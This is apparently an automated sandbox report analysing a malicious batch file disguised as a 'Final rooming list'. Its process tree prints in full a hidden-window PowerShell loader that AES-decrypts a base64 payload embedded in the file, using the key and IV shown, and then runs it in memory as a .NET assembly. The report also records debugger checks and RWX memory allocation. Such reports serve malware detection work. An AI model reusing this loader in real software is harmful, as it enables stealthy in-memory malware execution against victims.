Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 26, 2023, 10:23 a.m.	Oct. 26, 2023, 10:25 a.m.

Size	579.3KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`98000fd6e24b741927fd81c1d61ae996`
SHA256	`af5f068d0a2b8aa461a28be084e3e39cb7538b9b4b564e59cf75854420965271`
CRC32	`D4F9BBC0`
ssdeep	`12288:MPAyhLk9RwBGYSR+t1Q+H9Zj09JbQNJKIAM7PR27dtPbb/J:MP/sEGerZimXKlPnJ`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "LCtKcmsKEZFv" "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat"
2552
- cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat"
  2624
  - cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat"
    2728
    - attrib.exe attrib +h "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat.exe"
      2840
    - Final rooming list.bat.exe "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat.exe" -w hidden -c "$filePath = 'C:\Users\test22\AppData\Local\Temp\Final rooming list.bat'; $base64Pattern = '::(.*)'; $base64Code = ''; $found = $false; foreach ($line in [System.IO.File]::ReadLines($filePath)) { if ($line -match $base64Pattern) { $base64Code = $Matches[1].Trim(); $found = $true; break; } } if ($found) { $base64Code }; $key = 'S1h7yTlbJgEbe8fAoA0dwoHzF+iw98+iDWu9qKOt56s='; $iv = '9JUEq2XY9KUlMg+mRt4Zsg=='; $cryptedBytes = [System.Convert]::FromBase64String($base64Code); $aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider; $aes.Key = [System.Convert]::FromBase64String($key); $aes.IV = [System.Convert]::FromBase64String($iv); $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC; $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $decryptor = $aes.CreateDecryptor(); $decryptedBytes = $decryptor.TransformFinalBlock($cryptedBytes, 0, $cryptedBytes.Length); $assembly = [System.Reflection.Assembly]::Load($decryptedBytes); $entryPoint = $assembly.EntryPoint; $null = $entryPoint.Invoke($null, @())"
      2884

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA Oct. 26, 2023, 10:23 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW Oct. 26, 2023, 10:23 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 26, 2023, 10:23 a.m.			0	0

Command line console output was observed (50 out of 62 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: Method invocation failed because [System.IO.File] doesn't contain a method name console_handle: 0x00000023	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: d 'ReadLines'. console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: At line:1 char:181 console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: + $filePath = 'C:\Users\test22\AppData\Local\Temp\Final rooming list.bat'; $bas console_handle: 0x00000047	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: e64Pattern = '::(.*)'; $base64Code = ''; $found = $false; foreach ($line in [Sy console_handle: 0x00000053	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: stem.IO.File]::ReadLines <<<< ($filePath)) { if ($line -match $base64Pattern) { console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: $base64Code = $Matches[1].Trim(); $found = $true; break; } } if ($found) { $ba console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: se64Code }; $key = 'S1h7yTlbJgEbe8fAoA0dwoHzF+iw98+iDWu9qKOt56s='; $iv = '9JUEq console_handle: 0x00000077	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: 2XY9KUlMg+mRt4Zsg=='; $cryptedBytes = [System.Convert]::FromBase64String($base6 console_handle: 0x00000083	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: 4Code); $aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider console_handle: 0x0000008f	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: ; $aes.Key = [System.Convert]::FromBase64String($key); $aes.IV = [System.Conver console_handle: 0x0000009b	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: t]::FromBase64String($iv); $aes.Mode = [System.Security.Cryptography.CipherMode console_handle: 0x000000a7	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: ]::CBC; $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $decr console_handle: 0x000000b3	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: yptor = $aes.CreateDecryptor(); $decryptedBytes = $decryptor.TransformFinalBloc console_handle: 0x000000bf	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: k($cryptedBytes, 0, $cryptedBytes.Length); $assembly = [System.Reflection.Assem console_handle: 0x000000cb	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: bly]::Load($decryptedBytes); $entryPoint = $assembly.EntryPoint; $null = $entry console_handle: 0x000000d7	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: Point.Invoke($null, @()) console_handle: 0x000000e3	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: + CategoryInfo : InvalidOperation: (ReadLines:String) [], Runtime console_handle: 0x000000ef	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: Exception console_handle: 0x000000fb	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: + FullyQualifiedErrorId : MethodNotFound console_handle: 0x00000107	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly console_handle: 0x00000127	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: '0 bytes loaded from System.Management.Automation, Version=1.0.0.0, Culture=ne console_handle: 0x00000133	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: utral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An attempt console_handle: 0x0000013f	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: was made to load a program with an incorrect format." console_handle: 0x0000014b	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: At line:1 char:951 console_handle: 0x00000157	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: + $filePath = 'C:\Users\test22\AppData\Local\Temp\Final rooming list.bat'; $bas console_handle: 0x00000163	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: e64Pattern = '::(.*)'; $base64Code = ''; $found = $false; foreach ($line in [Sy console_handle: 0x0000016f	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: stem.IO.File]::ReadLines($filePath)) { if ($line -match $base64Pattern) { $base console_handle: 0x0000017b	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: 64Code = $Matches[1].Trim(); $found = $true; break; } } if ($found) { $base64Co console_handle: 0x00000187	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: de }; $key = 'S1h7yTlbJgEbe8fAoA0dwoHzF+iw98+iDWu9qKOt56s='; $iv = '9JUEq2XY9KU console_handle: 0x00000193	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: lMg+mRt4Zsg=='; $cryptedBytes = [System.Convert]::FromBase64String($base64Code) console_handle: 0x0000019f	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: ; $aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider; $aes console_handle: 0x000001ab	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: .Key = [System.Convert]::FromBase64String($key); $aes.IV = [System.Convert]::Fr console_handle: 0x000001b7	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: omBase64String($iv); $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC console_handle: 0x000001c3	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: ; $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $decryptor console_handle: 0x000001cf	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: = $aes.CreateDecryptor(); $decryptedBytes = $decryptor.TransformFinalBlock($cry console_handle: 0x000001db	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: ptedBytes, 0, $cryptedBytes.Length); $assembly = [System.Reflection.Assembly]:: console_handle: 0x000001e7	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: Load <<<< ($decryptedBytes); $entryPoint = $assembly.EntryPoint; $null = $entry console_handle: 0x000001f3	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: Point.Invoke($null, @()) console_handle: 0x000001ff	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000020b	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000217	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x00000237	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: At line:1 char:1032 console_handle: 0x00000243	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: + $filePath = 'C:\Users\test22\AppData\Local\Temp\Final rooming list.bat'; $bas console_handle: 0x0000024f	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: e64Pattern = '::(.*)'; $base64Code = ''; $found = $false; foreach ($line in [Sy console_handle: 0x0000025b	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: stem.IO.File]::ReadLines($filePath)) { if ($line -match $base64Pattern) { $base console_handle: 0x00000267	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: 64Code = $Matches[1].Trim(); $found = $true; break; } } if ($found) { $base64Co console_handle: 0x00000273	1	1
WriteConsoleW Oct. 26, 2023, 10:23 a.m.	buffer: de }; $key = 'S1h7yTlbJgEbe8fAoA0dwoHzF+iw98+iDWu9qKOt56s='; $iv = '9JUEq2XY9KU console_handle: 0x0000027f	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd5d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdc18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fd718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdcd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdcd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdcd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdcd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdcd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdcd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 10:23 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004fdd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 26, 2023, 10:23 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 141 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 1638400 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0260a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02602000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02612000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02613000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02614000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0264b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02647000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0260b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02645000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02615000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02940000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02616000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0264c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02633000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02634000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02636000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02637000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02638000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02639000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 10:23 a.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ec0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
